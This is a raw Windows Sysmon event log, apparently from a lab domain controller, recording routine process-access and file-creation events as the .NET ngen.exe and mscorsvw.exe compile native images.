13:50:18.228{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008131Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.212{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008130Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.212{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-E003-00000000A301}3080C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008129Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.134{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008128Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.119{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008127Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.119{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DF03-00000000A301}2820C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008126Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.087{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008125Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.072{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008124Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.072{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DE03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000008123Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.040{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008122Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:18.025{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008121Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:18.025{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921A-6005-DD03-00000000A301}5020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008156Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.978{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12f4-0\PresentationFramework-SystemData.dll2021-01-18 13:50:19.978 10341000x80000000000000008155Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.931{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008154Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.915{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008153Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.915{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E703-00000000A301}4852C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008152Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.868{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008151Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.853{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008150Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.853{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E603-00000000A301}2604C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008149Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:19.790{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1224-0\PresentationFramework-SystemCore.dll2021-01-18 13:50:19.790 10341000x80000000000000008148Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.681{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008147Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.665{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008146Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.665{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-921B-6005-E503-00000000A301}4644C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008145Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:19.306{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008144Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:19.290{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-921B-6005-E403-00000000A301}3808C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008143Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
